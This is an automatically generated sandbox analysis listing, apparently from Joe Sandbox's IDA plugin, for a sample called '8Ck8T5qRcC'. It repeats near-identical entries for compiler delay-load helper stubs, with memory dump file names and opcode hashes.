Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2bc5479f23e346e60adeed0634b564c90e413154008d7a99f023ba4ede0f7aa
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: d2bc5479f23e346e60adeed0634b564c90e413154008d7a99f023ba4ede0f7aa
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB0782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 31bb28a2ce0b1041985770f1f2e201bc5d1a8a37b3e700a5c9c67ca200973fb2
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 31bb28a2ce0b1041985770f1f2e201bc5d1a8a37b3e700a5c9c67ca200973fb2
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB075A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 04840c3fa446e56eb6d6d763e84f8ca601328ae1fd3fc3e12fdc8ab4217421fb
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 04840c3fa446e56eb6d6d763e84f8ca601328ae1fd3fc3e12fdc8ab4217421fb
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB0750 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e199f1a47eb7c5c67cce5188ac5ddb5a372ee31897a7d8b2bd7993671c1da86
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 7e199f1a47eb7c5c67cce5188ac5ddb5a372ee31897a7d8b2bd7993671c1da86
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB0746 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 08471d1f725897064bf2614223db17f2809244480891cf8ab774b471cf58d42b
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 08471d1f725897064bf2614223db17f2809244480891cf8ab774b471cf58d42b
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB0778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0e03c15bd17f6195cb4d795c453a012c317906ad44e0df915ced0b5423f8eebf
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 0e03c15bd17f6195cb4d795c453a012c317906ad44e0df915ced0b5423f8eebf
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB076E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c132ae5cd1171fa8c78f840c5d20c19781dd63238e3e98888043bde6aa2114bf
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: c132ae5cd1171fa8c78f840c5d20c19781dd63238e3e98888043bde6aa2114bf
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc1990a9d33323db428778c8e3c273f9be0a7eeb489d93aa41de3602ce76a5f9
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: fc1990a9d33323db428778c8e3c273f9be0a7eeb489d93aa41de3602ce76a5f9
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB073C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 43e5253bff55b9df779f39a794372ec4fbff77a0bfed380b0f6a71a68db7dd78
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 43e5253bff55b9df779f39a794372ec4fbff77a0bfed380b0f6a71a68db7dd78
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB0728 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00a728d84573bb921cab4116b0c0cf12dfca4e17d3c437b1755813ad3e74593a
Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
Opcode Fuzzy Hash: 00a728d84573bb921cab4116b0c0cf12dfca4e17d3c437b1755813ad3e74593a
Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030

Function 00DB08DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 053e225f7e629a1992f47b8e51268ee9d10aed7b65d8b40aa05e70a7578a86d2
Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
Opcode Fuzzy Hash: 053e225f7e629a1992f47b8e51268ee9d10aed7b65d8b40aa05e70a7578a86d2
Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1

Function 00DB08F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d85221a4b393166e8c26022bdc8d9e4dbb55a674e1170ea10e9d47abb5b56159
Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
Opcode Fuzzy Hash: d85221a4b393166e8c26022bdc8d9e4dbb55a674e1170ea10e9d47abb5b56159
Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1

Function 00DB08E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1c65f8afd80d3f16fffa2beaf08abf47ec92fd552133e9eaa2b7d5e209c2c152
Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
Opcode Fuzzy Hash: 1c65f8afd80d3f16fffa2beaf08abf47ec92fd552133e9eaa2b7d5e209c2c152
Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1

Function 00DB089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d997fcce715e91b2754fa75bcbdd914a9614b064a6bafb1d7b525ab5ec05cd42
Instruction ID: 13bbd57bc29ca08ed6e9e921e471f00d2601ef7fb6769a17201821c06c5bc4ca
Opcode Fuzzy Hash: d997fcce715e91b2754fa75bcbdd914a9614b064a6bafb1d7b525ab5ec05cd42
Instruction Fuzzy Hash: 01A001AA2A9212FC310973A5AD06DFB6A1DD4C0B2573099AEF44AD5486A880698950B1

Function 00DB08BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f21c474ecd3cf86129f356ee2352fd4fff90d908a23ecdb9c916a16009909c79
Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
Opcode Fuzzy Hash: f21c474ecd3cf86129f356ee2352fd4fff90d908a23ecdb9c916a16009909c79
Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1

Function 00DB08B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 12b6e5d188ae32be9156f6a3a44677bf735fc79a23e9780ec7a9f7cbf0977e95
Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
Opcode Fuzzy Hash: 12b6e5d188ae32be9156f6a3a44677bf735fc79a23e9780ec7a9f7cbf0977e95
Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1

Function 00DB0A50 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
